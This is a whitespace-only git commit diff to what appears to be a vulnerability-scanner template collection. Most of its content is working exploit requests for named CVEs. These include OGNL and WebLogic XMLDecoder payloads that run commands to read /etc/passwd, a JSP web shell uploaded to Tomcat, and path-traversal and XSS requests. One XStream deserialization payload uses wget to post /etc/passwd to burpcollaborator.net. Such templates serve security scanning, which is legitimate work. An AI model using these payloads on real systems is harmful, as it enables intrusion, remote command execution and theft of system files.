Satisfying the linter (all errors and warnings)

* whitespace modifications only
patch-1
forgedhallpass 2021-08-19 17:44:46 +03:00
parent 2a320412bf
commit 77103bc629
140 changed files with 543 additions and 543 deletions


@ -5,8 +5,8 @@ info:
author: pikpikcu author: pikpikcu
severity: high severity: high
reference: reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491 - https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd tags: beanshell,rce,cnvd
requests: requests:


@ -15,7 +15,7 @@ requests:
headers: headers:
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
body: | body: |
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -12,10 +12,10 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -15,7 +15,7 @@ requests:
headers: headers:
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
body: | body: |
name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -7,8 +7,8 @@ info:
description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container. description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
tags: cve,cve2013,lfi,javafaces,oracle tags: cve,cve2013,lfi,javafaces,oracle
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827 - https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- https://www.exploit-db.com/exploits/38802 - https://www.exploit-db.com/exploits/38802
requests: requests:
- method: GET - method: GET


@ -6,8 +6,8 @@ info:
severity: high severity: high
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
reference: reference:
- https://www.exploit-db.com/exploits/38936 - https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240 - https://nvd.nist.gov/vuln/detail/CVE-2013-7240
tags: cve,cve2013,wordpress,wp-plugin,lfi tags: cve,cve2013,wordpress,wp-plugin,lfi
requests: requests:


@ -6,8 +6,8 @@ info:
severity: medium severity: medium
tags: cve,cve2014,weblogic,oracle,ssrf tags: cve,cve2014,weblogic,oracle,ssrf
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://nvd.nist.gov/vuln/detail/CVE-2014-4210
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
requests: requests:
- method: GET - method: GET


@ -9,7 +9,7 @@ info:
- https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
description: | description: |
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
tags: cve,cve2015,jetty tags: cve,cve2015,jetty
requests: requests:


@ -1,25 +1,25 @@
id: CVE-2015-3337 id: CVE-2015-3337
info: info:
name: Elasticsearch Head plugin LFI name: Elasticsearch Head plugin LFI
author: pdteam author: pdteam
severity: high severity: high
description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors. description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
reference: https://www.exploit-db.com/exploits/37054/ reference: https://www.exploit-db.com/exploits/37054/
tags: cve,cve2015,elastic,lfi tags: cve,cve2015,elastic,lfi
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd" - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
part: body part: body
- type: status - type: status
status: status:
- 200 - 200


@ -1,27 +1,27 @@
id: CVE-2015-5688 id: CVE-2015-5688
info: info:
name: Geddy before v13.0.8 LFI name: Geddy before v13.0.8 LFI
author: pikpikcu author: pikpikcu
severity: high severity: high
description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI. description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
reference: reference:
- https://nodesecurity.io/advisories/geddy-directory-traversal - https://nodesecurity.io/advisories/geddy-directory-traversal
- https://github.com/geddy/geddy/issues/697 - https://github.com/geddy/geddy/issues/697
tags: cve,cve2015,geddy,lfi tags: cve,cve2015,geddy,lfi
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
part: body part: body
- type: status - type: status
status: status:
- 200 - 200


@ -5,8 +5,8 @@ info:
author: 0x_Akoko author: 0x_Akoko
description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability
reference: reference:
- https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-7823 - https://nvd.nist.gov/vuln/detail/CVE-2015-7823
severity: low severity: low
tags: cve,cve2015,kentico,redirect tags: cve,cve2015,kentico,redirect


@ -7,8 +7,8 @@ info:
tags: cve,cve2016,network,iot,hp,rce tags: cve,cve2016,network,iot,hp,rce
description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
reference: reference:
- https://www.exploit-db.com/exploits/39858 - https://www.exploit-db.com/exploits/39858
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004 - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
network: network:
- inputs: - inputs:


@ -1,24 +1,24 @@
id: CVE-2017-1000028 id: CVE-2017-1000028
info: info:
name: GlassFish LFI name: GlassFish LFI
author: pikpikcu author: pikpikcu
severity: high severity: high
description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request. description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
reference: https://www.exploit-db.com/exploits/45196 reference: https://www.exploit-db.com/exploits/45196
tags: cve,cve2017,oracle,glassfish,lfi tags: cve,cve2017,oracle,glassfish,lfi
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "/sbin/nologin" - "/sbin/nologin"
part: body part: body
- type: status - type: status
status: status:
- 200 - 200


@ -6,10 +6,10 @@ info:
severity: critical severity: critical
description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
reference: reference:
- https://github.com/mogwailabs/CVE-2017-1000486 - https://github.com/mogwailabs/CVE-2017-1000486
- https://github.com/pimps/CVE-2017-1000486 - https://github.com/pimps/CVE-2017-1000486
- https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000486 - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
tags: cve,cve2017,primetek,rce tags: cve,cve2017,primetek,rce
requests: requests:


@ -13,52 +13,52 @@ info:
requests: requests:
- raw: - raw:
- | - |
POST /wls-wsat/CoordinatorPortType HTTP/1.1 POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept: */* Accept: */*
Accept-Language: en Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close Connection: close
Content-Type: text/xml Content-Type: text/xml
Content-Length: 5178 Content-Length: 5178
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java> <java>
<void class="weblogic.utils.Hex" method="fromHexString" id="cls"> <void class="weblogic.utils.Hex" method="fromHexString" id="cls">
<string>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</string> <string>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</string>
</void> </void>
<void class="org.mozilla.classfile.DefiningClassLoader"> <void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass"> <void method="defineClass">
<string>com.supeream.exploits.XmlExp</string> <string>com.supeream.exploits.XmlExp</string>
<object idref="cls"></object> <object idref="cls"></object>
<void method="newInstance"> <void method="newInstance">
<void method="say" id="proc"> <void method="say" id="proc">
<string>cat /etc/passwd</string> <string>cat /etc/passwd</string>
</void> </void>
</void> </void>
</void> </void>
</void> </void>
<void class="java.lang.Thread" method="currentThread"> <void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork"> <void method="getCurrentWork">
<void method="getResponse"> <void method="getResponse">
<void method="getServletOutputStream"> <void method="getServletOutputStream">
<void method="writeStream"> <void method="writeStream">
<object idref="proc"></object> <object idref="proc"></object>
</void> </void>
<void method="flush"/> <void method="flush"/>
</void> </void>
<void method="getWriter"><void method="write"><string></string></void></void> <void method="getWriter"><void method="write"><string></string></void></void>
</void> </void>
</void> </void>
</void> </void>
</java> </java>
</work:WorkContext> </work:WorkContext>
</soapenv:Header> </soapenv:Header>
<soapenv:Body/> <soapenv:Body/>
</soapenv:Envelope> </soapenv:Envelope>
matchers: matchers:
- type: regex - type: regex


@ -6,9 +6,9 @@ info:
severity: critical severity: critical
description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data. description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-12149 - https://nvd.nist.gov/vuln/detail/CVE-2017-12149
- https://chowdera.com/2020/12/20201229190934023w.html - https://chowdera.com/2020/12/20201229190934023w.html
- https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
tags: cve,cve2017,java,rce,deserialization tags: cve,cve2017,java,rce,deserialization
requests: requests:


@ -6,8 +6,8 @@ info:
severity: critical severity: critical
description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found. description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-12542 - https://nvd.nist.gov/vuln/detail/CVE-2017-12542
- https://www.exploit-db.com/exploits/44005 - https://www.exploit-db.com/exploits/44005
tags: cve,cve2017,ilo4,hpe tags: cve,cve2017,ilo4,hpe
requests: requests:


@ -7,10 +7,10 @@ info:
tags: cve,cve2017,apache,rce tags: cve,cve2017,apache,rce
reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
description: | description: |
By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers. By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request. Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
requests: requests:
- method: PUT - method: PUT
@ -19,21 +19,21 @@ requests:
headers: headers:
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
body: | body: |
<%@ page import="java.util.*,java.io.*"%> <%@ page import="java.util.*,java.io.*"%>
<% <%
if (request.getParameter("cmd") != null) { if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>"); out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream(); OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream(); InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in); DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine(); String disr = dis.readLine();
while ( disr != null ) { while ( disr != null ) {
out.println(disr); out.println(disr);
disr = dis.readLine(); disr = dis.readLine();
} }
} }
%> %>
- method: GET - method: GET
path: path:


@ -6,10 +6,10 @@ info:
severity: critical severity: critical
tags: cve,cve2017,solr,apache,oob,xxe tags: cve,cve2017,solr,apache,oob,xxe
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629 - https://nvd.nist.gov/vuln/detail/CVE-2017-12629
- https://twitter.com/honoki/status/1298636315613974532 - https://twitter.com/honoki/status/1298636315613974532
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
requests: requests:
- raw: - raw:


@ -7,9 +7,9 @@ info:
description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
tags: cve,cve2017,sap,lfi tags: cve,cve2017,sap,lfi
reference: reference:
- https://www.cvedetails.com/cve/CVE-2017-12637/ - https://www.cvedetails.com/cve/CVE-2017-12637/
- https://nvd.nist.gov/vuln/detail/CVE-2017-12637 - https://nvd.nist.gov/vuln/detail/CVE-2017-12637
- https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
requests: requests:
- method: GET - method: GET


@ -5,8 +5,8 @@ info:
author: pikpikcu author: pikpikcu
severity: high severity: high
reference: reference:
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- https://www.exploit-db.com/exploits/49913 - https://www.exploit-db.com/exploits/49913
tags: cve,cve2017,trixbox,rce tags: cve,cve2017,trixbox,rce
requests: requests:


@ -7,9 +7,9 @@ info:
tags: cve,cve2017,trixbox,lfi tags: cve,cve2017,trixbox,lfi
description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php. description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-14537 - https://nvd.nist.gov/vuln/detail/CVE-2017-14537
- https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
- https://sourceforge.net/projects/asteriskathome/ # vendor homepage - https://sourceforge.net/projects/asteriskathome/ # vendor homepage
requests: requests:
- raw: - raw:


@ -4,8 +4,8 @@ info:
name: PreAuth RCE on Palo Alto GlobalProtect name: PreAuth RCE on Palo Alto GlobalProtect
author: emadshanab,milo2012 author: emadshanab,milo2012
reference: reference:
- https://www.exploit-db.com/exploits/43342 - https://www.exploit-db.com/exploits/43342
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
severity: high severity: high
tags: cve,cve2017,rce,vpn,paloalto,globalprotect tags: cve,cve2017,rce,vpn,paloalto,globalprotect


@ -7,8 +7,8 @@ info:
severity: high severity: high
tags: cve,cve2017,weblogic,oracle,rce,oob tags: cve,cve2017,weblogic,oracle,rce,oob
reference: reference:
- https://hackerone.com/reports/810778 - https://hackerone.com/reports/810778
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506
requests: requests:
- raw: - raw:


@ -5,8 +5,8 @@ info:
author: 0x_Akoko author: 0x_Akoko
severity: low severity: low
reference: reference:
- https://blog.zsec.uk/cve-2017-3528/ - https://blog.zsec.uk/cve-2017-3528/
- https://www.exploit-db.com/exploits/43592 - https://www.exploit-db.com/exploits/43592
tags: oracle,redirect tags: oracle,redirect
requests: requests:


@ -7,8 +7,8 @@ info:
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
tags: cve,cve2017,wordpress tags: cve,cve2017,wordpress
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-5487 - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
- https://www.exploit-db.com/exploits/41497 - https://www.exploit-db.com/exploits/41497
requests: requests:
- method: GET - method: GET


@ -10,15 +10,15 @@ info:
requests: requests:
- raw: - raw:
- | - |
GET / HTTP/1.1 GET / HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1 Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en Accept-Language: en
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
Connection: Keep-Alive Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
matchers: matchers:
- type: word - type: word


@ -18,63 +18,63 @@ requests:
headers: headers:
Content-Type: application/xml Content-Type: application/xml
body: | body: |
<map> <map>
<entry> <entry>
<jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString>
<flags>0</flags> <flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler> <dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream"> <is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher"> <cipher class="javax.crypto.NullCipher">
<initialized>false</initialized> <initialized>false</initialized>
<opmode>0</opmode> <opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator"> <serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/> <iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder"> <next class="java.lang.ProcessBuilder">
<command> <command>
<string>wget</string> <string>wget</string>
<string>--post-file</string> <string>--post-file</string>
<string>/etc/passwd</string> <string>/etc/passwd</string>
<string>burpcollaborator.net</string> <string>burpcollaborator.net</string>
</command> </command>
<redirectErrorStream>false</redirectErrorStream> <redirectErrorStream>false</redirectErrorStream>
</next> </next>
</iter> </iter>
<filter class="javax.imageio.ImageIO$ContainsFilter"> <filter class="javax.imageio.ImageIO$ContainsFilter">
<method> <method>
<class>java.lang.ProcessBuilder</class> <class>java.lang.ProcessBuilder</class>
<name>start</name> <name>start</name>
<parameter-types/> <parameter-types/>
</method> </method>
<name>asdasd</name> <name>asdasd</name>
</filter> </filter>
<next class="string">asdasd</next> <next class="string">asdasd</next>
</serviceIterator> </serviceIterator>
<lock/> <lock/>
</cipher> </cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/> <input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer> <ibuffer></ibuffer>
<done>false</done> <done>false</done>
<ostart>0</ostart> <ostart>0</ostart>
